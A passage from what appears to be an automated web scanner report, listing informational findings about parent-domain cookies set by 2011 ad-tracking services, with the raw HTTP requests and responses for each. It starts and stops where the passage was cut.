Set-Cookie: udm_0=MLv3NzMJZjpnHrwgn5OKIC8rjRkCYOhIvxMJqd1IRwcN114LmB1hUAo9AQIc2CCHUsGSvr68d9PUabSy8XykZXB/3l+HJH73OmlgZ4tiIxxd29qKVEBFtOHkIA69CBMvGklbIVYB0ACeEpxc1xsFm2BAOGetC5jxtgfiek+X/2FK/y9Pbu4V6nDlfqatTqQufnTHoZnUvbyhzvzoLjhkOZaG6fHVDlw77wXvw+fbrOmQCWEUkBfgcWmi/Zre1bmGyb7AGoGoCaiN9HPzQYgLw9WFU7LtfemAZqj0XBWia2dy1QDOQWH8Z+5L9lpl1fEaDfjx1nZF6AmT3WfTEJuoEkLbJoy2cLiPzJpAJZQjWiJPCORDCmEmHGzZFyQWahU2U1zs57DFXw3gD/iIS2UUnkP8UaJA5p/AFiW9trAtDRvxMrb8aCtC+AhrdUKtwuYsJyB8drLRtR7fkA+fNJKWw3ByqiFnMo3NPoVFfiZz+FKKdgiimCByqVJTKP4MU+v0+dfE+py/3A+D5rvkOkMk/3Z466oR26jTHWGfFoehWv74i6ioitgxAg/RSVmXioRB47xR0ikPU2um4sDrwT3VQJBJUU3pSvEdFuFQYUEla4XktcVxxF3o7ilLxqxROBHn3C8xQbdeyxfPY10leK5Ii4bvvVrvLxvVgHGfi+jxE8SRLCMsKFQkoIJDmwma8dGK+EXfwgIvZcZ/v6EdQQHvlSvBu9tlX86rhUvlOHosfPwwW1JCwtr7P4nZvbbtZL6Eqfj9ARWLPPbjjN3lsR4goJM7grCys2oYg4abb9/KqYUwLr3Tc5iUpOoK46uWE28v5hNG1oub9t7LLVMKD9E4+OQcWePEcj25kprN4LKFzmseXMl42ljLCnv3kmBKm783YNLdBEvwdITQj9yLi/eTYXCcGrJLYtrt3oieNpyaYRRYRDBfvg9EcqnRhBtnyj5HDVp3kPhLQCqoLPsuBslc7SgjbhhEaNc8nw1GcE835zwximZJ17a4tJtijwDHT6ZUvLdxqFH7Tm/XxMBqlpeXaL1B8CxIz0wyg6p6NEVYpxPrMsGPdrGsFB7BJzpL2eeEUW5Y+zGKdSEM+4lw06BXEqYVZeoSdutV9bSomgl593HXISI8QBs2LMohBcV0aGKUINJvO/WrxaqXB06uz8VF45FfqMEzlKUhAUkZRjXqHR+Ex4oNVEEy4BpjehToiDu8AuLUL1215rz6Fy3e0hK37n7uv7qzWRM0HB2mPnEFBGA/qkP/VhgjsbQIeLOWW6iSyfTjTXpYXFXYAkKqbUW67eq1vA89dONNMnxHxhj+UX2R0Fuofk2xpIzykCOmOI6+feKbU+rYcfNodXJBpIFDA3IJxDlYI3XStb5XBatWqL4lKsZFD2zEzSY88Cwmns0QYn/EH1DMQ0DF2uTf0pBiWXwujWi8leg/wnwXPA2goc/bg/637rNjz/smo/TqzuOsPXxFNLArjvVR7oiOWn6wJpiUp3hGTPMq+neb52yzfuNVMTglrNlwNpSx1vM5iOvojXVyJ4wyJjoUZMNusojEcUk2nAq62CtYFfuVbaWDQup3f6V1pSkWOcRkiwaLG9u5cDRnX8HqxerFU7M/C0wCVYUytNAem8HQrF5WZ+Saq5AwwnQt6WMhcydeU/kl4grLIgt7kUt4YiF7r0yhsHj5UAV3TeN+9ivAUEFlC29uj2NV9uJG4lgfoSo9595M2SK/x2MEZfSdAaZKGmkZ7CE9XhZL2fnhz3rTLP5Q0STw49XydtyAaeUgxKZm0pGR/yxosJMKWaWYSXBVAu75ZFB0HDM+7mYyYcBR2NySR3nFfohOz341Q5P5; Domain=.revsci.net; Expires=Wed, 13-Jun-2012 00:13:56 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:13:55 GMT
Content-Length: 743

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = ['D08734_72092','D08734_72131','D08734_72639','D08734_72674','D08734_72685','D08734_72764','D08734_72782','D08734_72765','D08734_72132'
...[SNIP]...

11.26. http://pix04.revsci.net/G07608/a4/0/0/pcx.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /G07608/a4/0/0/pcx.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /G07608/a4/0/0/pcx.js?csid=G07608 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JSQLVVzDFCtpU+w6+pH+Y1T9p9LQR/PMkrcUsw+1QGXy+LDb2WDbWjI6teif4fufdjX0iW0zQ3r14JwP/YaUQ4WilEZa1mTBgWbOLLoFHNs08LFTYabwcAaYOpnwILBLA0IVDPkmyj9OMIYKQd6IFV/U7eaOKVpIVUuoozuLsep7zskREZWlB8DC0Z6ZhAC9GNAaNN9SIPSSgIVwuLxxEDWGHmNvQReIPgONCKGbppyUb0MuDFLaVEB21tuA5eB0TwJEppny+pG7rWJSzu9wMWQAYB9UcEa+6Ot/GEdiBGBeZUz/PNWWpTFE5/VfQqv/UGRYazwgPLRpZV2N6R6V5RxGDtwcd0Kg+3xcyiKWsowuExSbhU6VEf7YyiTHaC/du9ddBfScpk1DTJwr8ORBVQshQVh3o+bELFMMFPcKJo85b+qpouTCGevSDP7mo2pY/E0fe1hI4sMnItTGq0az0BD+ZishUixzzbsiOwtQJOi2Ee8JJzVGdoZ61EKoghYOLhDc5eklez24xev7qKS9F7h1mC2RVCY2nxpOwc7SjqXGg/OCww4zaM9AMXFFE49FubdJ0St6r/fWqY7+kfyrhBgu+HSt4ihuLEBSkT05sHLFw5XrC1OeG2PPUrvuBk4AiZTFx38TRLswQ; rtc_AVou=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; rsiPus_NgLQ="MLsXtSUNJghnJ5E4m+qiOkhRwa7hUABMuZFInYmOU5CwyKrbszV5vmL8lWFj4llhxoQ3e1svCK92teQAGGpiXNNk5yhz0k6qMqepXctaemT1zUx64bqPVEDRu9imGo7Ebp2/fQojqVeFKRFF0SA4XwrjqmzDguHf3CyYsCjA09uTjSVJnoABAKJ060se1uo9aNjODvhDz1mbxjhn5k7S8kYNpVefcRkN0ezUbx4yXrKIfKXBpe8haW3Ezn+fg2+3yM7NzmkTlMJi3h2vEpw2B1Hwk/EoJir1a+frRQzq6BVY6++af6bNc9Gsel8szxe1MEEOovznC7OhxhCjQdnq9GL2yO7hYb+lryyzSBqtzIsro8Q+vfYkWgu6ScgTQgC8rvB1avsYeRGbFUvlIBBPOVTIgr31bZqzx0YcEN/qxv7tUWnYbT5qVI+mTiaeGzlurVYN4XcoTRK1iNhTaJGI9W3AcFxFgaLRHmcTh1xT5gRasLrNXoA7Yx36PKLO9qyEORWS8V+HKIP7KaQ0pYzzdT5VgCASQfBKiAp9Fx+vFry0uXdpmrgqwTKnQLh7EZud9NBB/tN7g4znELnLPgvwmOjVzMqdsluxw+PVxnHGpjJUy7CDJHju5PrhQYxgPzNBPg3XFE/IM8qxo9L8puKY63wUo1IJ34Bn2a3nPg99evpS3an0NjrEl9Lc8eMnPE97GKKtUAyp2BuzowKyN27UlRbyJ5kGO3taUNqu6LW7uuqNCi0auOQZpu93nkAwml8uw2P9zb+COGgVslqjvCqSLr4/hmETdV18EdqPJGoaOi0cnIT53ZC8YWsLbo3I5fBfvK+GxL5FQzqNBAvrhd5ETvk1RGVHPXX2KivKpgx2qbmaxEk26/0Bt9MCsofNUzBZcs4u17Jw7uu+hBTQ/vodZwbRVE0IV7cW+IRp8e65d9GvPVtbKW2iTDk7y5SxdiaJwgJGsVy5JNLgCv29A+BcG8QQFfshYztQVOhRMaXaLe3dcTg89YyUsbOH3GLMunfPyJtnAE9twjS4ZETuZV7awzx1MosM9q10mCc7wakiOxmYN/2lABAgiKXTzFfAwRzlIszYo6qtMwxJyltYn5qwTqvsLUVMklnjRTTDaod8z+TJuskM7y5mYJ9g5+jCrycFbRPpz7CBO/LzNfQxdOfAI3jLsj864lYcT9UI8a37SUrkU/0r7LyWYt9OGzcBvfZFprBRDH5kOeRCthtPFYWt0Rq6CT5CJT2H2svpkYiDMElia8cpDenaTXrVDzWjSU7CQjBru+DfQcMKHFRifQkiX+oS605HKn8AoAltf7tLRSZiOPCJMSdTvKumo9b3yOl6m30kP9qk"; rsi_us_1000000="pUMVIymnMBYY1A2AKVvIIuTBYTPKGKPeIlBjyVgbdZ29J76lIs/596g4gx56aSaUsZrP5kX0UekwLOgm90iPjD6R7o+WvDarELVc7RvdZ/T8x+dO+pdp/M4NeSFpZyEYS0O5hZpRcgjiqRjPjPMhDzn7qzSB5uGosGXOa1cwsHj5LNpFUOkdNazF1aDMTcpRZgNkLEY0wjS13tB3wtTOwfoZEQeeSALCIxbuvpHf3bx7mpsCYE02t4xzT5o9NKtvRMEVcfmJjc3/rHMJeDZjB86qQ4ocpYJanK6/Pqe5M++RPnRI6rsGSTSGOB6mSjo0G8NySzn8fumcLKrpCiOQiDYzIw4tbpGFRagp7cQ8VrvHvcVF2ZgBlwZfzy7L0brB9FTXEVeq85mz+ogNOZIpJeiMnvSJLazSGQtFqnBB4XI/dwG2Z2uDnBWI3dlO+qH9FOrWtOOI6v5o0c0TJMT5pGN2v3qnTrcXJvj7hyx+xL2yakmSWpVGywJp8KIUsi2WHeHHBQlgbHBDdmeC7bSsrQzMXvpaG+GBmFQ7QWOerx/xPuGjnEX7NNLSjzTjQLa+Ut7G+6DqE2jShJj/S6XlMCOZSfM9h+VEkH8+l0U0mKM5OK6ZlCAAKli/8grUHMZTQX4Bv6NOwfVnSOoUDG9JQX7uCDFLJNLVnkeCqup6fmOfmkomA2x/O3FB3QzU3xukWlM5u27FFyaYYnHtTkWARy8KeZ2JI3HiIbUfGCqZlp7Umjr0tqF1EXy/4/cjQ7n30Q8RGyC7P8hum2/tg3W3PhZXZpbLCUDphbywIgfBw8y6pMNc8BRAzl+0he/c1XF+0PQbflFiYFcXeGlnLw4Uwwvyhs/awd9sbMrsKRrVmJSzqNZmh0x5x0hVAWhvDCA6BQ8ZqURZOCjqiH855mK3sqrup8s9L575P6sOzyWxELCikSVQoeM6sR58ndOBRS2lG46Udf6M1JW4mZIFb/h5C4ZNCPsIV2mwp0R+xi0lSfmOSsobQut40tp2Td+svCzYt0y0+JotrL/193pAwAiyhfQ6O6CbHt0wF9h/DatbZ942q9SlD0Rmp9LU0ituiKtAnHfE5Onmr4vZpF8JulVfqOLUqaFJG6D9bfluIAfjJWTaPLtmQ3nG0HYMCIHlkOXG8M2Apa4lt5kLhvqhHjOaujZ3caw3GulwzzB95gN0PPH+YO/t7+bpXWE/JxC5NHN/PsidSh/4NMrrF6EfE9PjSOG6CO/Ck16C8OgG3I2l4aNEKz/AfAMb+obO8kko4u4n6XIAJhHFYMuO/zI8b2HyrM6QI0IL3nAmdxTLlf57zuGQSM+8GcRUaj9OMjdon5/TNQ+OW6oLUfodUGlXKTd8fPvkwo/3WbFcYAU6zWvBclL+/+bijDJqLIvaSaGZw/SIdawITb8khSgiQg4gzLk6nH+V1Hi2Q5XfnUDHftS51DCB/xZfAiQT2L24vMLep03CqjBA8NaAfyOmbAIa23LFACO6MJodJa3wiL8YVEo8ou3JMy3dGISGYik2x6fpsR/JNgqwJZSWVhCGB/bgJlpqYwaDB9VJOIImd95OXOiJdmw3VNVl33VouiAKJsBA/9zqU1FROc+iuYSn7hEK52PNFlNbLi8B3ORlodnhdCnixoikKCk9HQwBMAiV8W3BlMXW+lwpxJ4+Dvx1r3qomwkcET6PP16XX1ENsX32kpDWRJkMTNdlK6kqI6Y1a1dLfYCKNHUI+tEzMJ3YgRjYfzoV2sM8kQdnC6LkryLgBgAL4TF/43o="; udm_0=MLv3NzMJZjpn3hc5wFS813Gq21JyKlW/a0G0nU4qYXQr8bdIXllY4qSUGIMEVAYaUgmC7BE5rePyXCMhVeRUU77T0dB9laIjEG35bFZpiOLnlDdGTCFCQ0MEWZAmxumVjM+JUKi+lr0ZvsuCzJ6ckWKgM2OtiqD9UBfi+1+FEbO8SDIdRmUE/QHYAgD0BRAO1vqZsK3phnIHHJc9evRe+Zfm+Tk9uXoXINe9b7K4da4fOMFUkAPmcPkL7oUaiZo+zB3Vj59wmDAcZ+i2pP4y+DrGqQJ4422c4ku2MADSnGtyPVKqSIE7YSF35LTPZC1VtpFy8XSScJqe95WonH1o68US3zi9TlUL1DNZvOs54PKugt2D7oYeeUu7cPgxIPzPqQwTDLydgTDcNm+ud0e7udev/5FrU83+5sQHzARSPJV7BjZXMBYHVdPbXLgcpffXV5dy1h2qu7Y5BpTLpTJJMmQ4SyB3qE8rx9AmmTztdIVlW8Poy8G+Jw7xdO0qUFnOCnhJsEBVmvGOzwiKUOu8BrV1+IuW4C84KLuX6i0WQ1ychZvQsd4jYItN2ZaEmmxiPO0VHSP5+SV4NdIO7GjdrX8Wjli9o9x2guE1IXcQeTWhagmrxIa06M/Z9l8dBAw4gq+6XA6+SY81NzRWcSUTLp8d+rVmr8Q6zk1rmt09KMagZqQCpbQ4k3s+o2od1gaGpWkloOFCGaZnSA8FSQWGAcJQnRZtvsutuSsjPWXdjlClDyc26akmSJWi4grlIoaln+T0KcrxT0vPTcsBzR850hurWA1Yh/I/iJkOxptQVO2kiTwRzLru9N9oUQcTstfIMixT81uc5LjQeaidpT8vosi50NFzFVe3np8GQ4ZVAtGu6yCbMOOOi7enK8M2jI/3fdLFdMdOvS+435aVR3rkIhaRwfqwpPfSE/mXu49uTvBZRThdPnBAOjIIneapPU7sFczKownb1tWafVIW8R+SWBn+voW5C3J5TpPU5G8xTLlF6FaV5tvfGFCI458ex/CF7jdGelRCRZ0e67MDdJ3LlY7UAL8ma79sqd5DVX5GFejXCKA8BWvclbbbz2o/GN8a8Ksbd+IantFxPMDktxOajsinEElt0gXuHjkddFCGHA+cuYgde334avcjMiASDvS3ZM4RlSx9AGNKeXia/234gPT82RqePnu/Ghyp7AVar05f+HZOAElWzhGVDPGVEabC8S/EAoH+AhbGAm3gVc0bPXMqB85SpC3V5UAdKvSEPlJYC7ocx6qjeR6fk/Wbocy3PdIL58T4enH5STFqqujhseNSRnr2A+9+VO4sBOmJrHkP3OSBI5SPfECBEljsr3rfMc1HPYx2zhL4Vv/gTUDeirzONRGZT1+7lfWIpyc+j895bCkM73Cpb0YCQQvdWkhv3iYz+3u8faBHBbkKadQA0zyPzHtH63Xd9V6rfMsX7p4xMLpHFchX0M4jKIgrUfwlyFLPQMYB3mvM3iVmFzcF9L2inBeyWU9lsZI7tC65pTsyPVhf1NtNZdkMxZfskrgwDSwSwgPuupX5TgeJ8P4iT+8kman5SI0blgwfdfOt8qllPzU8IfZ1jznx90RMcWoObdvHaDszOUZ7lEpW3QM3NFGmaww8XOLnsgThSCe7MwZB82c47TUqLuCKeqtb9LJTycXnybjNiLQZPdyglSFanHImIgvH/lblsrhDMnzK5UBRVpQoFyMq6iW6N9ChO+FiCV/rKjWGAgmX5i9nMlPi22HA5ag1AMV8meFAWwnyjGSy69Cp

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JSQLVVzDFCtpU+w6+pH+Y1T9p9LQR/PMkrcUsw+1QGXy+LDb2WDbWjI6teif4fufdjX0iW0zQ3r14JwP/YaUQ4WilEZa1mTBgWbOLLoFHNs08LFTYabwcAaYOpnwILBLA0IVDPkmyj9OMIYKQd6IFV/U7eaOKVpIVUuoozuLsep7zskREZWlB8DC0Z6ZhAC9GNAaNN9SIPSSgIVwuLxxEDWGHmNvQReIPgONCKGbppyUb0MuDFLaVEB21tuA5eB0TwJEppny+pG7rWJSzu9wMWQAYB9UcEa+6Ot/GEdiBGBeZUz/PNWWpTFE5/VfQqv/UGRYazwgPLRpZV2N6R6V5RxGDtwcd0Kg+3xcyiKWsowuExSbhU6VEf7YyiTHaC/du9ddBfScpk1DTJwr8ORBVQshQVh3o+bELFMMFPcKJo85b+qpouTCGevSDP2NA44HumkHp4sxPiq7xWC7/Y18Cw1YHMTLmGU0sq3aJetGtkv45Wol0tdvAh/b6SngNrsnWV9CEMk+xEkfM0nen61A/5z+1R9Olfwa/+uGCb9KGCWYT8JqLUEQcwjhy6MqcGqTVnRoKesTa1naELxWNlZl+r+hZigxeGhWsNKi7RyenIZrasb0i+THLaSjlsB4UnTg7aueb3MJbisx+; Domain=.revsci.net; Expires=Wed, 13-Jun-2012 00:13:55 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:13:54 GMT
Content-Length: 941

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
var rsinetsegs=['G07608_10004','G07608_10009','G07608_10016','G07608_10017','G07608_10001'];
var rsicsl="lDlIlPlQlA";
var rsiExp=new Date((new Date(
...[SNIP]...

11.27. http://px.owneriq.net/ep  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://px.owneriq.net
Path:   /ep

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ep?sid%5B%5D=133789898&sid%5B%5D=133443903&sid%5B%5D=133663613&rid%5B%5D=1203653&rid%5B%5D=1203654&rid%5B%5D=1203953 HTTP/1.1
Host: px.owneriq.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=3106981;type=forex803;cat=forex519;ord=1;num=1308052950?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: si=3589157951140485318; gguuid=CAESECRt4BlvfnFjSL7l7K77jrU; oxuuid=7bbcd01e-f726-4eb0-8371-0cfa1038e6ef; ss=uxrmw.12sfs0.12sj04.uxrmh.12sfs5.12sizp.uxrmm.nqhjy.12sfsa.12sizu.uxrmr.njtv7.12sfsf.12sizz; apq=.; rpq=.

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.15 (Fedora)
Content-Length: 153
Content-Type: text/html
Location: http://ib.adnxs.com/pxj?bidder=13&seg=49740&action=as(133789898);as(133443903);as(133663613);&redir=http%3a%2f%2fad.yieldmanager.com%2fpixel%3fadv%3d95413%26t%3d2%26id%3d1203653%26id%3d1203654%26id%3d1203953
Set-Cookie: ss=27g5z3.uxrmw.12sfs0.12sj04.uxrmh.12sfs5.12sizp.27kvi5.uxrmm.nqhjy.12sfsa.12sizu.27nky2.uxrmr.njtv7.12sfsf.12sizz; expires=Sun, 12 Jun 2016 12:02:41 GMT; path=/; domain=.owneriq.net
Set-Cookie: apq=.; expires=Sun, 12 Jun 2016 12:02:41 GMT; path=/; domain=.owneriq.net
Set-Cookie: rpq=.; expires=Sun, 12 Jun 2016 12:02:41 GMT; path=/; domain=.owneriq.net
X-Powered-By: PHP/5.2.13
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Cache-Control: max-age=20498
Date: Tue, 14 Jun 2011 12:02:41 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

11.28. http://stgapi.choicestream.com/instr/csanywhere.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stgapi.choicestream.com
Path:   /instr/csanywhere.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /instr/csanywhere.js HTTP/1.1
Host: stgapi.choicestream.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: CSAnywhere=0b0f2d25-87ef-4be4-8d6e-adf8f861c5b6

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-CS-Request-Id: 416b7a85-3459-413f-9abb-9ac5225a9955
P3P: policyref="http://www.choicestream.com/w3c/p3p.xml",CP="NOI DSP COR NID ADMa DEVa PSAo PSDo OUR STP"
ETag: W/"84353-1300364150000"
Last-Modified: Thu, 17 Mar 2011 12:15:50 GMT
Content-Type: text/javascript
ntCoent-Length: 84353
Cache-Control: private
Content-Length: 84353
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 17:45:46 GMT
Connection: close
Set-Cookie: CSAnywhere=0b0f2d25-87ef-4be4-8d6e-adf8f861c5b6; Domain=.choicestream.com; Expires=Tue, 12-Jun-2012 17:45:46 GMT; Path=/

/*
* Copyright (c) 2000-2011 ChoiceStream, Inc. All Rights Reserved
*/
(function(){if(window.jQuery){var _jQuery=window.jQuery}var jQuery=window.jQuery=function(selector,context){return new jQuery.
...[SNIP]...

11.29. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s21898508197627  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s21898508197627

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

